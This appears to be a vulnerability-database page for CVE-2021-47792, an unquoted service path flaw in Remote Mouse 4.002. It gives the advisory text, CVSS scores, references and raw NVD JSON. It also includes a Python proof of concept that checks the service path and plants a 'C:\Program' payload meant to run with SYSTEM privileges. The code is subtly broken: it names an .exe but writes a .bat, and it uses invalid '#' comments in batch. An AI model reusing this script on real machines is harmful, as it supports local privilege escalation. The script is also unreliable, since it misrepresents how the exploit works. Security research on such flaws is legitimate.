CVE-2021-47792

Description

Remote Mouse 4.002 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the RemoteMouseService to inject malicious executables and gain administrative access.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:remotemouse:remote_mouse:3.008:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:remotemouse:remote_mouse:4.002:*:*:*:*:*:*:* - VULNERABLE

Remote Mouse 4.002及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2021-47792 PoC - Remote Mouse Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in Remote Mouse 4.002

import os
import sys
import shutil
import subprocess

def check_vulnerability():
    """Check if Remote Mouse service exists and has unquoted path"""
    try:
        result = subprocess.run(
            ['sc', 'qc', 'RemoteMouseService'],
            capture_output=True,
            text=True
        )
        if 'BINARY_PATH_NAME' in result.stdout:
            print("[+] RemoteMouseService found")
            # Extract the path (simplified for demonstration)
            for line in result.stdout.split('\n'):
                if 'BINARY_PATH' in line:
                    print(f"[+] Service path: {line.strip()}")
                    if '"' not in line:
                        print("[!] Service path is unquoted - VULNERABLE")
                        return True
        return False
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False

def create_payload():
    """Generate malicious executable to be placed in unquoted path"""
    malicious_exe = "C:\\Program.exe"
    # In real attack, this would be a malicious executable
    # For demonstration, creating a simple batch script wrapper
    payload_code = '''@echo off
# Malicious code would be executed here with SYSTEM privileges
echo [+] Payload executed with SYSTEM privileges >> C:\\temp\\pwned.log
'''
    try:
        os.makedirs("C:\\temp", exist_ok=True)
        with open(malicious_exe.replace('.exe', '.bat'), 'w') as f:
            f.write(payload_code)
        print(f"[+] Payload created: {malicious_exe.replace('.exe', '.bat')}")
        return True
    except Exception as e:
        print(f"[-] Failed to create payload: {e}")
        return False

if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2021-47792 PoC - Remote Mouse Unquoted Service Path")
    print("=" * 60)
    
    if check_vulnerability():
        print("[+] Target is vulnerable")
        create_payload()
        print("[+] Wait for service restart to trigger payload execution")
    else:
        print("[-] Target is not vulnerable or RemoteMouseService not found")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47792
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47792
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47792/
[4] VulDB https://vuldb.com/cve/CVE-2021-47792
[5] https://www.exploit-db.com/exploits/50258
[6] https://www.remotemouse.net/
[7] https://www.vulncheck.com/advisories/remote-mouse-unquoted-service-path
[8] https://www.exploit-db.com/exploits/50258

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47792", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:23.010", "lastModified": "2026-01-30T00:58:02.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Remote Mouse 4.002 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the RemoteMouseService to inject malicious executables and gain administrative access."}, {"lang": "es", "value": "Remote Mouse 4.002 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta de servicio sin comillas en el RemoteMouseService para inyectar ejecutables maliciosos y obtener acceso administrativo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remotemouse:remote_mouse:3.008:*:*:*:*:*:*:*", "matchCriteriaId": "703EC414-3BD6-4486-98DB-3B0B1F6B2D04"}, {"vulnerable": true, "criteria": "cpe:2.3:a:remotemouse:remote_mouse:4.002:*:*:*:*:*:*:*", "matchCriteriaId": "062159B1-0120-4046-BA30-F31BF3CD47E9"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50258", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.remotemouse.net/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/remote-mouse-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50258", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}